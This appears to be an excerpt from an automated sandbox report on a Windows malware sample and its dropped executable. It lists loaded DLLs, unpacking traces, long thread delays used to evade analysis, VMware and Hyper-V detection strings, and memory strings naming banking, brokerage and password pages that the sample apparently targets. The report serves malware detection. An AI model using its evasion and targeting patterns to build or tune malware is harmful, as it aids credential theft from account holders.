        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: msvcr100.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: msvcr100.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: webio.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

        Data Obfuscation

        barindex
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeUnpacked PE file: 0.2.K27Yg4V48M.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeUnpacked PE file: 2.2.1831.tmp.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeUnpacked PE file: 0.2.K27Yg4V48M.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeUnpacked PE file: 2.2.1831.tmp.exe.400000.0.unpack
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_00410766 push ecx; ret 0_2_00410779
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0040FD8C push ecx; ret 0_2_0040FD9F
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_020C339D push 00000003h; ret 0_2_020C33A1
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_020C15F2 push es; iretd 0_2_020C1603
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_020C5B28 push ecx; ret 0_2_020C5B45
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_020C59AA pushad ; ret 0_2_020C59C6
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_020C2EFC pushad ; ret 0_2_020C2F24
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0213799F push esp; retf 0_2_021379A7
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_021109CD push ecx; ret 0_2_021109E0
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0211CE18 push ss; retf 0_2_0211CE1D
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_02137F9D push esp; retf 0_2_02137F9E
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0210FFF3 push ecx; ret 0_2_02110006
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_02139DE8 pushad ; retf 0_2_02139DEF
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_004499A1 push esp; ret 2_2_004499A2
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_0044AAD0 push ecx; retn 0041h2_2_0044AAD5
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020A2361 push 00000004h; ret 2_2_020A2375
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020A30C7 push 0F56897Eh; iretd 2_2_020A30DF
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020A646F push ebp; ret 2_2_020A6470
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_020A3CDA push esi; retn 001Ch2_2_020A3CDE
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeCode function: 2_2_02101A8C pushad ; retf 0044h2_2_02101A93
        Source: K27Yg4V48M.exeStatic PE information: section name: .text entropy: 7.870521705718039
        Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.831859637421663
        Source: 1831.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.831859637421663
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exeJump to dropped file
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeFile created: C:\Users\user\AppData\Local\Temp\1831.tmp.exeJump to dropped file
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E974
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeWindow / User API: threadDelayed 4064Jump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeWindow / User API: threadDelayed 5922Jump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-65572
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeAPI coverage: 5.1 %
        Source: C:\Users\user\Desktop\K27Yg4V48M.exe TID: 5508Thread sleep count: 4064 > 30Jump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exe TID: 5508Thread sleep time: -2934208s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exe TID: 5508Thread sleep count: 5922 > 30Jump to behavior
        Source: C:\Users\user\Desktop\K27Yg4V48M.exe TID: 5508Thread sleep time: -4275684s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exe TID: 2704Thread sleep time: -150000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_004389F2 FindFirstFileExW,0_2_004389F2
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_02138C59 FindFirstFileExW,0_2_02138C59
        Source: Amcache.hve.5.drBinary or memory string: VMware
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F84000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
        Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: K27Yg4V48M.exe, 00000000.00000002.4481263101.000000000068B000.00000004.00000020.00020000.00000000.sdmp, K27Yg4V48M.exe, 00000000.00000003.4317071653.000000000065B000.00000004.00000020.00020000.00000000.sdmp, K27Yg4V48M.exe, 00000000.00000003.4317071653.000000000068B000.00000004.00000020.00020000.00000000.sdmp, K27Yg4V48M.exe, 00000000.00000002.4481263101.000000000065D000.00000004.00000020.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2077120697.00000000004B5000.00000004.00000020.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000002.2277491965.00000000004B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
        Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
        Source: Amcache.hve.5.drBinary or memory string: vmci.sys
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F84000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
        Source: Amcache.hve.5.drBinary or memory string: VMware20,1
        Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
        Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
        Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
        Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
        Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
        Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
        Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
        Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
        Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
        Source: 1831.tmp.exe, 00000002.00000002.2277491965.000000000048A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
        Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
        Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
        Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
        Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
        Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: 1831.tmp.exe, 00000002.00000003.2093689019.0000000002F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
